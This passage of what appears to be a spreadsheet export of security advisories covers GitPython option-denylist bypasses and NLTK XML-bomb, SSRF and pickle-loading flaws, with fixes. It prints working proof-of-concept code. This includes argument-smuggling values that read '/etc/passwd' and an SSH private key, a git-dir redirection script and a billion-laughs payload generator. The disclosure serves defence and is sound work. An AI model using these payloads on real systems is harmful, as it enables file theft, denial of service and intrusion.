`git clone` also accepts `--separate-git-dir=&lt;path&gt;`, which redirects the repository's entire `.git` metadata directory to an **arbitrary, caller-controlled filesystem path**, leaving only a gitlink text file (`gitdir: &lt;path&gt;`) at the intended destination. This is the exact same primitive already recognized as unsafe by GitPython's own code: `Repo.unsafe_git_init_options` (line 145-150) blocks `--separate-git-dir` for `Repo.init()`, with the comment *"Redirects the repository metadata to a caller-controlled path"*. The `Repo._clone()`/`clone()`/`clone_from()` docstring (line 1450-1452) is even more explicit:

```
:param allow_unsafe_options:
    Allow unsafe options to be used, such as ``--template`` and
    ``--separate-git-dir``.
```

i.e. the maintainers' own documentation states that `allow_unsafe_options=False` (the default) is supposed to block `--separate-git-dir` for clone. But **`Repo.unsafe_git_clone_options` does not contain it**:

```python
unsafe_git_clone_options = [
    "--upload-pack",
    "-u",
    "--config",
    "-c",
    "--template",
    "--bundle-uri",
]
```

So any application that forwards a `separate_git_dir` (or `separate-git-dir`) kwarg into `Repo.clone_from()` / `Repo.clone()` — e.g. a CI/build service, a Git-hosting proxy, or any tool that exposes a subset of clone options to a client, the exact threat model already accepted for the sibling `--template`/`--upload-pack`/`--config` entries in this same list — gets **no protection at all** for `--separate-git-dir`, even with the default `allow_unsafe_options=False`.

## Root cause
Parity gap between two sibling denylists that guard the same underlying primitive (arbitrary redirection of git metadata storage): `unsafe_git_init_options` correctly lists `--separate-git-dir`; `unsafe_git_clone_options`, covering the same option on a different git subcommand that also accepts it, does not — despite the function's own docstring claiming otherwise. This is the same "denylist omits an equally-dangerous sibling option" pattern already responsible for `GHSA-539m-9xh6-q6rr` (`archive` denylist missing `--add-file`/`--add-virtual-file`) and `GHSA-6p8h-3wgx-97gf` (`clone` denylist missing `--template`, since fixed).

## Exploit path
1. Attacker-controlled input reaches a `separate_git_dir=...` (or equivalently `"separate-git-dir"`) keyword argument passed into `Repo.clone_from()` / `Repo.clone()` by the host application, with `allow_unsafe_options` left at its default `False`.
2. `Git._option_candidates()` renders this as `--separate-git-dir` and `Git.check_unsafe_options()` checks it against `Repo.unsafe_git_clone_options` — no match, no `UnsafeOptionError` raised.
3. `Git.transform_kwargs()` renders the same kwarg into the real command line as `--separate-git-dir=&lt;attacker path&gt;` and GitPython executes `git clone -v --separate-git-dir=&lt;attacker path&gt; -- &lt;url&gt; &lt;dest&gt;` via `subprocess` (no shell).
4. `git` itself creates the full repository metadata tree (`config`, `description`, `HEAD`, `hooks/`, `index`, `objects/`, `refs/`, `packed-refs`, `logs/`) at the attacker-specified path — which can be **any path outside the intended clone destination** that the process has permission to create — and leaves a gitlink file at the intended destination pointing to it.

## Impact
Arbitrary directory/file creation at a path fully controlled by the attacker (bounded only by filesystem permissions of the process running GitPython), matching the impact class of the already-published, High-severity `GHSA-hmq2-w58f-27jc` ("Arbitrary Git Repository Creation Outside the Working Tree", CVSS 8.2). Concretely:
- Planting a git repository structure (including a `hooks/` directory) at an attacker-chosen location outside the sandboxed clone destination the calling application intended to confine the operation to.
- If the attacker-chosen path collides with an existing directory the process can write into (e.g. another repository's `.git`, a shared cache path, a predictable temp location), the clone silently populates/overwrites `config`, `HEAD`, `hooks/*`, `refs/*`, `packed-refs`, and `index` there — an integrity violation of a resource outside the intended destination.
- Combined with any later operation that runs `git` against that redirected/colliding directory (common in CI/build systems that reuse or predict working-directory layouts), this can escalate to hook execution, matching the RCE class already accepted for `--template` in `GHSA-9rj7-rf2p-w77r`.

## Preconditions
- The calling application forwards a caller-influenced value into a `separate_git_dir` kwarg of `Repo.clone_from()`/`Repo.clone()` (or into the `multi_options` list as a raw `--separate-git-dir=...` token) without itself validating/rejecting it, and does not pass `allow_unsafe_options=True` intentionally. This is the identical trust model GitPython's own denylist already defends for `--template`/`--upload-pack`/`--config`/`--bundle-uri` on the very same code path — i.e. this option was clearly meant to be covered by the same guard and was simply omitted.
- No authentication/role requirement inside GitPython itself; the vulnerable code runs the moment the host application calls the API with the option present.

## Evidence
- `git/repo/base.py:145-151` — `unsafe_git_init_options` includes `"--separate-git-dir"` with the comment "Redirects the repository metadata to a caller-controlled path".
- `git/repo/base.py:153-165` — `unsafe_git_clone_options` (the list actually enforced on `_clone`) does **not** include `"--separate-git-dir"`.
- `git/repo/base.py:1450-1452` — docstring of `clone_from`/`clone` explicitly documents `--separate-git-dir` as one of the options `allow_unsafe_options` is supposed to gate.
- `git/repo/base.py:1495-1518` — `_clone()` special-cases `separate_git_dir` only to `Git.polish_url()` it (path normalization for URL-like values), then runs it through `Git.check_unsafe_options(options=..., unsafe_options=cls.unsafe_git_clone_options)` — which, per the list above, does not flag it.
- PoC (`gitpython-001-poc.py`, embedded below) run against this exact checkout confirms the option reaches the real `git clone` subprocess unguarded and creates a full git directory outside the destination path, with `allow_unsafe_options` at its default `False`.

## False-positive check (adversarial re-read)
- **Is there a value-level check that would still stop this?** No — `check_unsafe_options` only inspects option *names* (via `_canonicalize_option_name`) against the denylist; it performs no filesystem/path validation on `separate_git_dir`'s value, and no other guard in `_clone()` touches this kwarg besides the `Git.polish_url()` normalization (which does not reject arbitrary paths).
- **Is `--separate-git-dir` perhaps a no-op or safely sandboxed for `clone` specifically (unlike `init`)?** No — confirmed empirically: the option reaches the real `git` binary unmodified and git honors it exactly as documented, writing the full metadata tree to the given path.
- **Could this be the exact bug already covered by one of the 26 published GHSAs?** Checked all 26 entries in `_known-advisories.json` (Filter 0): `GHSA-9rj7-rf2p-w77r` covers `--template` in `Repo.init`; `GHSA-6p8h-3wgx-97gf` covers `--template` in clone (already fixed, present in `unsafe_git_clone_options`); `GHSA-hmq2-w58f-27jc` covers arbitrary repo creation via unvalidated **`.gitmodules` submodule names** (a different code path — `Submodule`, not `Repo.clone_from()` kwargs). None reference `--separate-git-dir` on the clone path. This is a distinct, currently-unpatched gap.
- **Does this require an unrealistic precondition?** The precondition (host app forwards a kwarg into `clone_from`/`clone`) is identical to the precondition already accepted by the maintainers for the sibling entries in the same list (`--template`, `--upload-pack`, `--config`, `--bundle-uri`) — i.e. it is the same threat model the guard exists to cover, just missing one entry.
- Verdict: no concrete blocker found. **CONFIRMED.**

## Remediation
Add `"--separate-git-dir"` (and its `-` alias if git ever adds one — currently there is none) to `Repo.unsafe_git_clone_options` in `git/repo/base.py`, matching `unsafe_git_init_options`. Since `Repo._clone()` already special-cases `separate_git_dir` for `Git.polish_url()` normalization, the fix is a one-line addition to the existing list, consistent with how `GHSA-6p8h-3wgx-97gf` added `--template` to the same list.

## Confidence
High. Root cause is a one-line, unambiguous omission the maintainers' own docstring contradicts; PoC reproduces cleanly and deterministically against the current HEAD; no plausible false-positive path found.


## Proof-of-Concept source (`gitpython-001-poc.py`)

```python
#!/usr/bin/env python3
"""
GITPYTHON-001 PoC: Repo.clone_from(separate_git_dir=...) is not in
unsafe_git_clone_options, so it reaches `git clone` unguarded and writes a
full git directory (config, hooks/, objects/, refs/, ...) to an
attacker-controlled path OUTSIDE the intended destination directory, with
allow_unsafe_options left at its default of False.

Run against the GitPython source tree under test, e.g.:
  PYTHONPATH="&lt;repo&gt;:&lt;repo&gt;/gitdb:&lt;repo&gt;/smmap" python3 gitpython-001-poc.py &lt;workdir&gt;

Benign: only writes/reads inside the given workdir. No destructive/exfiltrating
payload. Exits non-zero and prints "NOT VULNERABLE" if the guard blocks the option
or the write does not escape the destination directory.
"""
import os
import sys
import subprocess


def main():
    workdir = sys.argv[1] if len(sys.argv) &gt; 1 else "/tmp/gitpython-001-poc"
    src = os.path.join(workdir, "src")
    dest = os.path.join(workdir, "dest")
    sentinel_dir = os.path.join(workdir, "OUTSIDE_SENTINEL")
    target_gitdir = os.path.join(sentinel_dir, "redirected.git")

    for p in (src, dest, sentinel_dir):
        os.makedirs(p, exist_ok=True)

    # Minimal benign source repo to clone from.
    subprocess.run(["git", "init", "-q", "-b", "main", src], check=True)
    subprocess.run(["git", "-C", src, "config", "user.email", "test@example.com"], check=True)
    subprocess.run(["git", "-C", src, "config", "user.name", "Test"], check=True)
    with open(os.path.join(src, "file.txt"), "w") as f:
        f.write("hello\n")
    subprocess.run(["git", "-C", src, "add", "file.txt"], check=True)
    subprocess.run(["git", "-C", src, "commit", "-q", "-m", "init"], check=True)

    import git  # gitpython under test

    print("unsafe_git_clone_options =", git.Repo.unsafe_git_clone_options)
    assert "--separate-git-dir" not in git.Repo.unsafe_git_clone_options, (
        "guard now includes --separate-git-dir; PoC no longer applicable, target patched"
    )

    try:
        repo = git.Repo.clone_from(src, dest, separate_git_dir=target_gitdir)
    except git.exc.UnsafeOptionError as e:
        print("NOT VULNERABLE: blocked by UnsafeOptionError:", e)
        sys.exit(1)

    wrote_outside = os.path.isdir(os.path.join(target_gitdir, "hooks")) and os.path.isfile(
        os.path.join(target_gitdir, "config")
    )
    gitlink_points_outside = False
    with open(os.path.join(dest, ".git")) as f:
        gitlink = f.read().strip()
        gitlink_points_outside = target_gitdir in gitlink

    print("repo.git_dir =", repo.git_dir)
    print("wrote git directory outside dest (sentinel) =", wrote_outside)
    print("dest/.git gitlink points outside dest =", gitlink_points_outside)

    if wrote_outside and gitlink_points_outside:
        print("VULNERABLE: git directory created at attacker-controlled path "
              f"outside the clone destination: {target_gitdir}")
        sys.exit(0)
    else:
        print("NOT VULNERABLE: sentinel not observed")
        sys.exit(1)


if __name__ == "__main__":
    main()

```</t></is></c><c r="T1602" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78677</t></is></c></row><row r="1603"><c r="A1603" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1603" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1603" s="5" t="inlineStr"><is><t>CVE-2026-78678</t></is></c><c r="D1603" s="5" t="inlineStr" /><c r="E1603" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1603" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1603" s="5" t="inlineStr" /><c r="H1603" s="5" t="n"><v>0.002</v></c><c r="I1603" s="5" t="inlineStr" /><c r="J1603" s="5" t="inlineStr" /><c r="K1603" s="5" t="inlineStr" /><c r="L1603" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M1603" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N1603" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1603" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1603" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1603" s="5" t="inlineStr" /><c r="R1603" s="5" t="inlineStr" /><c r="S1603" s="5" t="inlineStr"><is><t>## Summary
`Repo.blame()` / `Repo.blame_incremental()` guard forwarded revision options against `unsafe_git_revision_options`, but that denylist only contains the file-WRITE options `--output`/`-o`. `git blame` also honors `--contents &lt;file&gt;` and `-S &lt;file&gt;`, which cause the file's lines to be echoed into the blame result — an arbitrary file READ. Neither option is in the denylist, so a caller-influenced revision value of `--contents=&lt;path&gt;` passes the guard and leaks file contents. This is a distinct sink-option and impact class (READ) from GHSA-956x-8gvw-wg5v (which addressed the blame `--output` WRITE), directly analogous to GHSA-539m-9xh6-q6rr (archive READ gap accepted separately from the archive write/exec advisory).

## Root Cause
`unsafe_git_revision_options = ["--output","-o"]` (`git/repo/base.py:188`). The `rev` string is passed to `_option_candidates([rev], kwargs)` and placed BEFORE the `--` separator (base.py:841). The canonical name of `--contents=...` is `contents`, which is not on the denylist, so no `UnsafeOptionError` is raised. The trailing `--` protects only the pathspec, not the option before the revision.

## Impact
Arbitrary local file read at the privileges of the host process; the file's line contents appear in the blame result returned to the caller. Pure VALUE control (the caller forwards a user-influenced revision string). Default `allow_unsafe_options=False`.

## Proof of Concept
```python
result = repo.blame("--contents=/etc/passwd", "a.txt")
# result rows carry the victim file's line text
```

## Attack Chain
1. Entry: app calls `repo.blame(rev, file)` with attacker `rev="--contents=/etc/passwd"` (or kwarg `contents="/etc/passwd"`, or `-S`).
2. Check: `Git.check_unsafe_options(_option_candidates([rev,...], kwargs), unsafe_git_revision_options)` @ base.py:841. Guard: denylist = `["--output","-o"]` only. Bypass proof: canonical name `contents` ∉ denylist → no error.
3. Sink: `self.git.blame(rev, "--", file, p=True, ...)`. argv (observed): `['git','blame','-p','--contents=&lt;secret&gt;','HEAD','--','a.txt']`.
4. Impact: blame result rows carry the victim file's line text.

## Bypass Evidence
Independently reproduced (independent test harness, default `allow_unsafe_options=False`): `blame('--contents=&lt;secret&gt;','a.txt')` → guard PASSED; result rows = `['GATE_SECRET_LINE_A','GATE_SECRET_LINE_B']`. Control: `blame('--output=…')` still BLOCKED (guard active on this path). `-S` kwarg argv also reaches git unguarded.

## Affected Versions
`GitPython &lt;= 3.1.58` (denylist present verbatim on the latest release tag).

## Suggested Fix
Prefer an allowlist of blame options; at minimum add `--contents`/`-S` (and any other path-taking blame options) to `unsafe_git_revision_options`, and make the membership rule "the option takes a filesystem path" rather than "the option writes output".

---
Reported by **zx (Jace)** — GitHub: @manus-use</t></is></c><c r="T1603" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78678</t></is></c></row><row r="1604"><c r="A1604" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1604" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1604" s="5" t="inlineStr"><is><t>CVE-2026-78679</t></is></c><c r="D1604" s="5" t="inlineStr" /><c r="E1604" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1604" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1604" s="5" t="inlineStr" /><c r="H1604" s="5" t="n"><v>0.002</v></c><c r="I1604" s="5" t="inlineStr" /><c r="J1604" s="5" t="inlineStr" /><c r="K1604" s="5" t="inlineStr" /><c r="L1604" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M1604" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N1604" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1604" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1604" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1604" s="5" t="inlineStr" /><c r="R1604" s="5" t="inlineStr" /><c r="S1604" s="5" t="inlineStr"><is><t>## Summary
`TagReference.create()` forwards a caller-influenced positional `reference` value into `git tag` without it ever being inspected by the unsafe-option guard, allowing an arbitrary file read (the file's contents are returned in-band as the annotated tag message). This is an incomplete-fix bypass of commit `3af0c251` (the fix for GHSA-3f7w-8rr8-f37f's tag instance).

## Root Cause
The fix `3af0c251` added `unsafe_git_tag_options = ["--file","-F"]` and a guard call, but the guard is `Git.check_unsafe_options(options=Git._option_candidates([], kwargs), unsafe_options=...)` at `git/refs/tag.py:139` — it passes an EMPTY args list and inspects **kwargs only**. The dangerous values `path` and `reference` are POSITIONALS (`args = (path, reference)`, tag.py:156), placed before any `--`. A user-influenced `reference="--file=&lt;path&gt;"` therefore reaches `git tag` as the exact `--file` option the fix intended to block, creating an annotated tag whose message is the file's contents.

## Impact
Arbitrary local file read at the privileges of the host process; contents returned in-band via `tagref.tag.message`. Requires the embedding application to forward a caller-influenced `reference` value into `TagReference.create()` (pure VALUE control — the CVE-2026-42215 threat model). Default `allow_unsafe_options=False`.

## Proof of Concept
```python
from git import TagReference
t = TagReference.create(repo, "vpwn", reference="--file=/home/app/.ssh/id_rsa")
print(t.tag.message)   # contents of the file
```

## Attack Chain
1. Entry: app calls `TagReference.create(repo, name, reference=&lt;user&gt;)` with `reference="--file=/home/app/.ssh/id_rsa"`.
2. Check: `Git.check_unsafe_options(_option_candidates([], kwargs), ["--file","-F"])` @ tag.py:137-141. Guard: denylist includes `--file`/`-F`. Bypass proof: `_option_candidates` receives `args=[]` → the positional `reference` is never a candidate (the kwarg spelling `file="…"` IS blocked; only the positional escapes).
3. Sink: `repo.git.tag(*args, **kwargs)` @ tag.py:158 → no `--`. argv (observed): `['git','tag','-f','vpwn','--file=&lt;secret&gt;']`.
4. Impact: annotated tag created; `tagref.tag.message` == file contents (arbitrary file read).

## Bypass Evidence
Independently reproduced (independent test harness, git 2.43.0, default `allow_unsafe_options=False`): `TagReference.create(repo,'vp','--file=&lt;secret&gt;')` → PASSED; `tag.message == 'GATE_SECRET_LINE_A\nGATE_SECRET_LINE_B'`. Control: `TagReference.create(..., file='&lt;secret&gt;')` → `UnsafeOptionError: --file is not allowed`. Fix-commit read: `3af0c251` adds `_option_candidates([], kwargs)` (empty args → positional never a candidate).

## Affected Versions
`GitPython &lt;= 3.1.58` (sink present verbatim on the latest release tag; `git diff 3.1.57..HEAD` touches only test files).

## Suggested Fix
Include the positional `reference` (and `path`) in the option-candidate list passed to `check_unsafe_options`, or place a `--` separator before the positional arguments in `TagReference.create()`.

---
Reported by **zx (Jace)** — GitHub: @manus-use</t></is></c><c r="T1604" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78679</t></is></c></row><row r="1605"><c r="A1605" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1605" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1605" s="5" t="inlineStr"><is><t>CVE-2026-78681</t></is></c><c r="D1605" s="5" t="inlineStr" /><c r="E1605" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1605" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1605" s="5" t="inlineStr" /><c r="H1605" s="5" t="n"><v>0.003</v></c><c r="I1605" s="5" t="inlineStr" /><c r="J1605" s="5" t="inlineStr" /><c r="K1605" s="5" t="inlineStr" /><c r="L1605" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1605" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1605" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1605" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1605" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1605" s="5" t="inlineStr" /><c r="R1605" s="5" t="inlineStr" /><c r="S1605" s="5" t="inlineStr"><is><t>Several XML parsing sites in NLTK still used `xml.etree.ElementTree` directly, which honours `&lt;!ENTITY&gt;` declarations in a document's internal DTD subset. A crafted document a few hundred bytes long can expand to megabytes in memory (each nesting level multiplies by ten), a denial-of-service.

Affected call sites (&lt;= 3.10.2):
- `nltk.chunk.named_entity.load_ace_file` — parses ACE annotation XML
- `nltk.internals.ElementWrapper` — converts any given string to an Element
- `nltk.downloader` — `Package.fromxml`, `Collection.fromxml`, `_find_collections`, `_find_packages`

libexpat 2.6.0 added an input-amplification cap, but it only engages above an activation threshold (~8 MiB output) and depends on whichever libexpat the interpreter links; builds against older libexpat have no cap at all. External entities are not resolved by ElementTree, so this is a memory-amplification DoS (CWE-776), not XXE/file disclosure.

This completes the earlier defusedxml adoption that these sites were missed by. Fix routes all of them through a new `nltk.xmlsec` module that refuses entity declarations, preferring `defusedxml` and falling back to a standard-library `xml.parsers.expat` pre-scan when defusedxml is absent.

---

## Attack demonstration

Reproducible PoC against a real affected entry point (`nltk.internals.ElementWrapper`). Every number below is captured output, not illustrative.

### 1. The amplification (vulnerable path: raw `xml.etree.ElementTree`)

A payload of a few hundred bytes expands to megabytes in memory. Each nesting level multiplies output by 10 while adding ~56 bytes of input:

| levels | input bytes | expanded bytes | factor |
|--------|-------------|----------------|--------|
| 3 | 218 | 10,000 | x45 |
| 4 | 274 | 100,000 | x364 |
| 5 | 330 | 1,000,000 | x3,030 |
| 6 | 386 | (libexpat 2.7.1 cap trips) | - |

The level-6 cap is **libexpat's**, not NLTK's: it only engages above an ~8 MiB activation threshold, and older libexpat builds (still shipped with many 3.10/3.11 interpreters) have no cap at all. Under the threshold — up to ~1 MB per parse here — expansion always succeeds.

```python
import xml.etree.ElementTree as ET
def bomb(levels):
    d = "\n".join(f'&lt;!ENTITY e{i} "{("&amp;e%d;"%(i-1))*10}"&gt;' for i in range(1, levels+1))
    return f'&lt;!DOCTYPE d [&lt;!ENTITY e0 "AAAAAAAAAA"&gt;{d}]&gt;&lt;d&gt;&amp;e{levels};&lt;/d&gt;'
ET.fromstring(bomb(5))   # -&gt; element whose .text is 1,000,000 chars
```

### 2. The patched entry point rejects it

```
&gt;&gt;&gt; from nltk.internals import ElementWrapper
&gt;&gt;&gt; ElementWrapper(bomb(5))
EntitiesForbidden: EntitiesForbidden(name='e0', ...)
```

### 3. Why a text-based screen is not enough

An entity declaration can hide behind a decoy `&lt;!DOCTYPE&gt;` in a prolog comment. Raw ElementTree still processes the real declaration and expands; a guard that walks the DOCTYPE text is fooled. The shipped guard re-parses with expat, so it is not:

```python
evil = '&lt;!-- &lt;!DOCTYPE x [ ] &gt; --&gt;&lt;!DOCTYPE d [&lt;!ENTITY a "PPPP..."&gt;]&gt;&lt;d&gt;&amp;a;&lt;/d&gt;'
```

```
raw ElementTree -&gt; EXPANDS ('PPPPPPPPPPPP...', 40 chars)
nltk.xmlsec     -&gt; REJECTED (EntitiesForbidden)
```

An earlier draft of the fallback that walked the text **was** bypassed by this and 4 similar payloads (decoy DOCTYPE in a PI, stray `]` inside a PI in the internal subset). All five are now regression tests.

### 4. Both back ends block it

`nltk.xmlsec` prefers `defusedxml` and falls back to a stdlib `xml.parsers.expat` pre-scan. Same payloads, defusedxml hidden to force the fallback:

```
stdlib fallback | billion-laughs               -&gt; REJECTED (EntitiesForbidden)
stdlib fallback | comment-decoy differential   -&gt; REJECTED (EntitiesForbidden)
```

Environment: python 3.13.7, libexpat 2.7.1. Confirmed identical amplification on python 3.10 (NLTK's floor).</t></is></c><c r="T1605" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78681</t></is></c></row><row r="1606"><c r="A1606" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1606" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1606" s="5" t="inlineStr"><is><t>CVE-2026-78682</t></is></c><c r="D1606" s="5" t="inlineStr" /><c r="E1606" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1606" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1606" s="5" t="inlineStr" /><c r="H1606" s="5" t="n"><v>0.003</v></c><c r="I1606" s="5" t="inlineStr" /><c r="J1606" s="5" t="inlineStr" /><c r="K1606" s="5" t="inlineStr" /><c r="L1606" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1606" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1606" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1606" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1606" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1606" s="5" t="inlineStr" /><c r="R1606" s="5" t="inlineStr" /><c r="S1606" s="5" t="inlineStr"><is><t>### Summary

Current NLTK source reopens SSRF in proxied environments. `pathsec.urlopen()` validates the requested hostname locally, but once proxy inheritance is enabled the real fetch is performed by the proxy rather than by the validated direct-connect socket path.

### Details

- **Vulnerability type:** Server-side request forgery
- **Affected component:** `nltk.pathsec.urlopen`, `nltk.data.load`, `nltk.downloader.Downloader.index`, `nltk.downloader.Downloader.download`
- **Affected versions:** Current source `v3.10.0-rc2`; published `3.9.4` was a negative control and did not reproduce.
- **Patched versions:** Not yet patched
- **Root cause:** Proxy-handler inheritance disables `_SafeHTTPHandler` and `_SafeHTTPSHandler`, so the validated hostname no longer matches the actual egress destination.

The hardened direct path pins the validated numeric destination IP before opening the socket. The proxied branch instead copies `ProxyHandler` instances from the global opener, marks the request as proxied, and skips the pinned handlers. I confirmed that a validated public URL can be fetched from a loopback-only internal service through the proxy path via `pathsec.urlopen()`, `nltk.data.load()`, `Downloader.index()`, and `Downloader.download()`.

### PoC

**Preconditions**
- The runtime has an HTTP proxy configured and the caller relies on `pathsec` to keep network fetches SSRF-safe.

**Steps**
1. Start a loopback-only HTTP server that serves secret text, a valid downloader index, and a ZIP payload.
2. Configure a proxy that forwards a validated public URL to that internal loopback service.
3. Call `pathsec.urlopen()` or `nltk.data.load()` on the public URL and observe the internal response is returned.
4. Instantiate `Downloader(server_index_url=...)`, call `index()` and `download()`, and observe internal-only content is parsed and installed.

**Minimal reproducible excerpt**

```text
{'urlopen': 'PROXY_TEXT_SECRET', 'data_load': 'PROXY_TEXT_SECRET', 'downloaded_file': 'INTERNAL_ZIP_SECRET'}
```

### Impact

Consumers that trust `pathsec` as an SSRF barrier in proxied environments can be made to read internal-only HTTP resources, load forged downloader indexes, and install attacker-chosen package content fetched from the proxy's network view.

### Remediation

Preserve destination validation for the actual proxy egress target or fail closed when the request would otherwise downgrade into an unpinned proxied path. Add regression tests across `pathsec.urlopen`, `nltk.data.load`, and downloader fetches with a configured proxy.

### References

- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/pathsec.py#L468-L518
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/data.py#L1247-L1283
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/downloader.py#L875-L889
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/downloader.py#L1220-L1226
- https://github.com/nltk/nltk/blob/3.9.4/nltk/pathsec.py#L245-L250

---

## Fix + attack demonstration (verified)


NLTK cannot pin the egress through a proxy, so it stops pretending to: under `ENFORCE` a proxied fetch is **refused** rather than performed unvalidated. Operators who trust their proxy opt back in with `NLTK_ALLOW_PROXIED_URLOPEN=1` or `nltk.pathsec.ALLOW_PROXIED_FETCH=True`; under `ENFORCE=False` the refusal degrades to a warning. This closes the **whole class** (environment proxies and explicit `ProxyHandler` alike), because NLTK declines any fetch whose egress it cannot validate.

## Attack demonstration (reproduced; captured output)
A loopback HTTP server stands in for the internal target; `http_proxy` points at it; NLTK is asked for a **public** IP URL.

**Before the fix** — the internal secret is exfiltrated through the proxy:
```
validate_network_url(public): PASSED
*** BYPASS: pathsec.urlopen returned INTERNAL content via proxy: 'INTERNAL_ONLY_SECRET'
```

**After the fix** — five scenarios, isolated subprocesses:
| Scenario | Result |
|---|---|
| proxied (env) + ENFORCE | `PermissionError` — **blocked** |
| proxied + opt-in | returns secret — escape hatch works |
| explicit `ProxyHandler` (not env) + ENFORCE | `PermissionError` — **blocked** (whole class) |
| no proxy (direct) | internal IP still refused — pinning intact |
| proxied + `ENFORCE=False` | returns secret **+ warns** |

## Tests
`nltk/test/unit/test_pathsec.py`: 64 passed. Added an end-to-end regression (`test_proxied_fetch_does_not_reach_internal_target`) plus `test_env_proxy_fails_closed_under_enforce`; the prior `test_env_proxy_skips_pinning_handlers` (which encoded the vulnerable path) is re-expressed as the opt-in case. Existing direct-path DNS-rebinding and IP-policy tests unchanged and passing. pre-commit (isort/black/ruff) clean.

## Note
The upfront `validate_network_url()` and the direct-path IP pinning (from the earlier DNS-rebinding fixes, CVE-2026-54296 / GHSA-qvv7) are unchanged — this only closes the proxied downgrade they didn't cover.</t></is></c><c r="T1606" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78682</t></is></c></row><row r="1607"><c r="A1607" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1607" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1607" s="5" t="inlineStr"><is><t>CVE-2026-78683</t></is></c><c r="D1607" s="5" t="inlineStr" /><c r="E1607" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1607" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1607" s="5" t="inlineStr" /><c r="H1607" s="5" t="n"><v>0.003</v></c><c r="I1607" s="5" t="inlineStr" /><c r="J1607" s="5" t="inlineStr" /><c r="K1607" s="5" t="inlineStr" /><c r="L1607" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1607" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N1607" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1607" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1607" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1607" s="5" t="inlineStr" /><c r="R1607" s="5" t="inlineStr" /><c r="S1607" s="5" t="inlineStr"><is><t>## Summary

The NLTK library's `TransitionParser.parse()` method deserializes model files using `pickle_load()` with the default `restricted=False` parameter, allowing arbitrary Python code execution when loading a malicious model file. The library provides a `RestrictedUnpickler` class for safe deserialization, but it is never used by production code paths, leaving the vulnerability unpatched.

## Root Cause

**File:** `nltk/parse/transitionparser.py` (lines 542-557)

The `parse()` method calls `pickle_load(f)` without `restricted=True`, routing through `WarningUnpickler` which inherits from `pickle.Unpickler` and does NOT override `find_class()`. This allows arbitrary class/function resolution during unpickling, enabling RCE via standard pickle gadgets (e.g., `os.system`, `subprocess.Popen`).

**Vulnerability chain in `nltk/picklesec.py`:**

```python
def pickle_load(file, *, context=None, restricted=False):
    if restricted:
        return RestrictedUnpickler(file).load()  # Safe: blocks all globals
    return WarningUnpickler(file, context=context).load()  # VULNERABLE PATH
```

`WarningUnpickler` only emits a warning but does NOT block unsafe class loading — it calls `super().load()` which is standard `pickle.Unpickler.load()`.

**Why this is not by design:**
- NLTK intentionally created `RestrictedUnpickler` to block unsafe deserialization
- The `restricted=True` parameter exists in the API but is **never used** by any production code path
- All call sites use the default `restricted=False`: `transitionparser.py:557`, `parse/chartparser_app.py:816`, `parse/chartparser_app.py:2273`, `parse/chartparser_app.py:2311`

## Attack Surface

**Entry point:** `TransitionParser().parse(depgraphs, modelFile)` receives a filesystem path with no validation.

**Exploitation path:**
1. Attacker places a malicious pickle file at a known or attacker-controlled location
2. Victim calls `parser.parse(sentences, "/path/to/malicious_model.pkl")`
3. `pickle_load()` deserializes the file with `restricted=False` (default)
